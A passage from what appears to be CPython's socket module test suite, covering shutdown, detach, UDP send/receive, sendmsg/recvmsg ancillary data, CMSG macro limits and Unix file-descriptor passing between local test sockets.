self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
# FreeBSD < 8 doesn't always set the MSG_TRUNC flag when a truncated
# datagram is received (issue #13001).
@support.requires_freebsd_version(8)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
@support.requires_freebsd_version(8)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
